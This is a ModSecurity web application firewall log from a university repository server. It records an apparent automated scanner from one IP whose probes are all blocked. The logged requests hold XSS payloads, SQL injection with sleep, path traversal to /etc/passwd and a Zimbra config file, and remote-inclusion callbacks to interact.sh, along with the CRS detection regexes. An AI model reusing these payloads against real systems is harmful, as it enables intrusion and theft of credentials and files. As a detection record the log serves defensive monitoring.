[Tue Aug 29 11:52:06.561225 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:to: /92874';alert(document.domain)//280"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/auth/login"] [unique_id "ZO15dsCo-f0AAAlIBjgAAAAn"]
[Tue Aug 29 11:52:06.569720 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:secret. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:secret: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/login.php"] [unique_id "ZO15dsCo-f0AAAnn2AkAAAAe"]
[Tue Aug 29 11:52:06.585444 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:page: javascript:alert(document.domain)//"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "repositoryfeb.unla.ac.id"] [uri "/iwc/idcStateError.iwc"] [unique_id "ZO15dsCo-f0AAAhoHTsAAAAl"]
[Tue Aug 29 11:52:08.613064 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15eMCo-f0AAAfWOLcAAAAL"]
[Tue Aug 29 11:52:08.659728 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fill. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fill: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/checklist/images/checklist-icon.php"] [unique_id "ZO15eMCo-f0AAAnd3EwAAAAI"]
[Tue Aug 29 11:52:09.673610 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15ecCo-f0AAAnkwfIAAAAY"]
[Tue Aug 29 11:52:09.701622 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: domain)>11 found within ARGS:email: test@test.com\\x22><img src=a onerror=alert(document.domain)>11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/seo/seopanel/login.php"] [unique_id "ZO15ecCo-f0AAAnTlL8AAAAA"]
[Tue Aug 29 11:52:10.625069 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15esCo-f0AAAnn2A4AAAAe"]
[Tue Aug 29 11:52:11.667489 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15e8Co-f0AAAhoHUgAAAAl"]
[Tue Aug 29 11:52:11.691560 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:password: admin\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO15e8Co-f0AAAlIBj4AAAAn"]
[Tue Aug 29 11:52:12.620708 2023] [:error] [pid 2536] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15fMCo-f0AAAnoOpcAAAAf"]
[Tue Aug 29 11:52:13.711429 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15fcCo-f0AAAn95@0AAAAD"]
[Tue Aug 29 11:52:13.712280 2023] [:error] [pid 2536] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/propertyfinder/component/jesectionfinder/"] [unique_id "ZO15fcCo-f0AAAnoOpsAAAAf"]
[Tue Aug 29 11:52:14.558585 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 3 / [28] [BANNER_AREA_FOOTER2] \\xd0\\x9f\\xd0\\xbe\\xd1\\x81\\xd0\\xb5\\xd1\\x82\\xd0\\xb8\\xd1\\x82\\xd0\\xb5 \\xd0\\xb2\\xd0\\xb2\\xd0\\xbe\\xd0\\xb4\\xd0\\xbd\\xd1\\x83\\xd1\\x8e \\xd0\\xb1\\xd0\\xb5\\xd1\\x81\\xd0\\xbf\\xd0\\xbb\\xd0\\xb0\\xd1\\x82\\xd0\\xbd\\xd1\\x83\\xd1\\x8e \\xd0\\xbb\\xd0\\xb5\\xd0\\xba\\xd1\\x86\\xd0\\xb8\\xd1\\x8e APTOS"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15fsCo-f0AAAn95-AAAAAD"]
[Tue Aug 29 11:52:14.697463 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:1[3]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))-- found within ARGS:1[3]: or 'a'='a') and (select sleep(6))--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/api/v1/components"] [unique_id "ZO15fsCo-f0AAAni@-8AAAAU"]
[Tue Aug 29 11:52:14.726820 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/remotereporter/load_logfiles.php"] [unique_id "ZO15fsCo-f0AAAn0GcsAAAAa"]
[Tue Aug 29 11:52:15.544040 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 1 / [84] [MOBILE_HOME] Love Card"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15f8Co-f0AAAn0Gc0AAAAa"]
[Tue Aug 29 11:52:16.670103 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../../../../../../../../../../etc"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/download"] [unique_id "ZO15gMCo-f0AAAnjjNUAAAAX"]
[Tue Aug 29 11:52:16.715186 2023] [:error] [pid 2536] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 1 / [691] [NEW_INDEX_BANNERS] Trade-in football"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15gMCo-f0AAAnoOqYAAAAf"]
[Tue Aug 29 11:52:17.688186 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../../../../../../../../../../etc"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/laravel-filemanager/download"] [unique_id "ZO15gcCo-f0AAAnn2CMAAAAe"]
[Tue Aug 29 11:52:17.793487 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 5 / [129] [GARMIN_AKCII] Garmin \\xe1\\xee\\xed\\xf3\\xf1 \\xed\\xee\\xe2\\xee\\xf1\\xf2\\xfc \\xe2 \\xe0\\xea\\xf6\\xe8\\xe8"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15gcCo-f0AAAn95-wAAAAD"]
[Tue Aug 29 11:52:17.799935 2023] [:error] [pid 2564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ContactId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:ContactId: \\x22><script>alert(document.domain);</script><\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php"] [unique_id "ZO15gcCo-f0AAAoEZMMAAAAB"]
[Tue Aug 29 11:52:17.860348 2023] [:error] [pid 2564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15gcCo-f0AAAoEZMUAAAAB"]
[Tue Aug 29 11:52:18.626825 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b found within ARGS:event1: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15gsCo-f0AAAn400AAAAAW"]
[Tue Aug 29 11:52:19.642893 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b found within ARGS:event1: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15g8Co-f0AAAnkwhUAAAAY"]
[Tue Aug 29 11:52:21.211017 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:author: x\\x22 onmouseover=alert(document.domain) x="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15hcCo-f0AAAn400cAAAAW"]
[Tue Aug 29 11:52:22.001590 2023] [:error] [pid 2572] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: x\\x22 onmouseover=alert(document.domain) x=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/forum/index.php"] [unique_id "ZO15hsCo-f0AAAoMLZ4AAAAH"]
[Tue Aug 29 11:52:23.551262 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://\\x22- found within ARGS:url: xss://\\x22-alert(document.domain)-\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/embed-swagger/swagger-iframe.php"] [unique_id "ZO15h8Co-f0AAAnkwikAAAAY"]
[Tue Aug 29 11:52:24.695199 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: 2Ue0JPPIf6oq1562KE1G556xZAu\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/templates/pages/debug_panel.php"] [unique_id "ZO15iMCo-f0AAAn400kAAAAW"]
[Tue Aug 29 11:52:25.576751 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:skin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:skin: ../../../../../../../../../opt/zimbra/conf/localconfig.xml\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx TemplateMsg.js.zgz"] [unique_id "ZO15icCo-f0AAAoO5ykAAAAK"]
[Tue Aug 29 11:52:26.604220 2023] [:error] [pid 2536] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] 